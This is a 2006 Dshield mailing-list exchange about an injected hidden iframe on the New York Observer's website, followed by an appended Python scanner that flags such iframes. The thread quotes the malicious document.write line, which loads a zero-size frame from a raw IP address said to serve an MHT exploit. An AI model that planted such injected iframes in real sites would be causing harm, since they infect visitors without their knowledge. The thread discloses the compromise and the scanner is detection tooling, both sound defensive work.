[Dshield] New York Newspaper hacked

ptds@majordomo.thedacare.org ptds at majordomo.thedacare.org
Mon Feb 27 02:57:03 GMT 2006


On Sun, 26 Feb 2006, Tom wrote:

> At 8:37 AM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
> >Anyone know a human at the observer in New York?
> >
> >Someone has put an iframe exploit into the code inserted on each page.
> >
> >Don't go here:
> >
> >http://
> >www.observer.com/ 20060227 / 20060227_Joe_Conason_opinions_conason.asp
> 
> All I see are iframes being used for ads as seen below. 
> advertserve.com seems like a totally legit biz and I pulled some ads 
> and they are legit also. What made you think this is an exploit?

The iframe is inserted on every page, lives here,
www.observer.com// includes/ nyo.js

 and reads 
document.write('<iframe height=0 width=0 
src="http:// 210.118.120.49/ HitCount/ Top.Htm"></iframe>'

It seems it was inserted last Sunday.

This, when retrieved, is an mht exploit.

The less daring can see a jpg of its effect here
http://rrcs-24-106-25-102.west.biz.rr.com/exploit.jpg

210.118.120.49 these guys don't answer their abuse email:
[ ISP IPv4 Admin Contact Information ]
Name               : IPAdministrator
Phone              : +82-2-509-0534
E-Mail             : snnoc at samsung.com

[ ISP IPv4 Tech Contact Information ]
Name               : IP Manager
Phone              : +82-2-509-0534
E-Mail             : snnoc at samsung.com

[ ISP Network Abuse Contact Information ]
Name               : NetworkAbuse
Phone              : +82-2-509-0534
E-Mail             : ipabuse at samsung.com

Paul
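
An added example, not part of the original post: a defender-side check that scans a site's JavaScript include for the pattern described above, a hidden iframe written by document.write() that loads from another host, while leaving visible ad frames alone. The function names, the site host "news.example" and the sample hosts are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# String argument of document.write()/writeln(), single- or double-quoted.
DOC_WRITE = re.compile(r"""document\.write(?:ln)?\s*\(\s*(['"])((?:\\.|(?!\1).)*)\1""", re.I | re.S)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HIDING_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def is_hidden(attrs):
    """True for 0x0 frames or frames hidden through inline style."""
    zero = {"0", "0px"}
    if attrs.get("width") in zero and attrs.get("height") in zero:
        return True
    return bool(HIDING_STYLE.search(attrs.get("style", "")))


def find_hidden_iframes(js_text, site_host):
    """Return hidden iframes written by script that load from another host."""
    findings = []
    for call in DOC_WRITE.finditer(js_text):
        for tag in IFRAME.finditer(call.group(2)):
            attrs = {n.lower(): (dq or sq or bare)
                     for n, dq, sq, bare in ATTR.findall(tag.group(1))}
            host = urlparse(attrs.get("src", "")).hostname
            if host is None or host == site_host.lower():
                continue  # relative or same-site frame
            if is_hidden(attrs):
                findings.append({"src": attrs["src"], "host": host,
                                 "raw_ip": bool(IPV4.match(host))})
    return findings


# Constructed sample: a site-wide include with one visible ad frame and one
# hidden frame (hosts are placeholders, not values from the post).
SAMPLE_JS = r'''
document.write('<iframe width=728 height=90 src="http://ads.example.net/serve?zone=1"></iframe>');
document.write('<iframe height=0 width=0 src="http://192.0.2.10/counter/top.htm"></iframe>');
'''

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_JS, "news.example"):
        print(finding)
```

The check only sees markup passed to document.write() as a plain string literal; script that builds the tag by concatenation or decoding needs the rendered DOM inspected instead.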


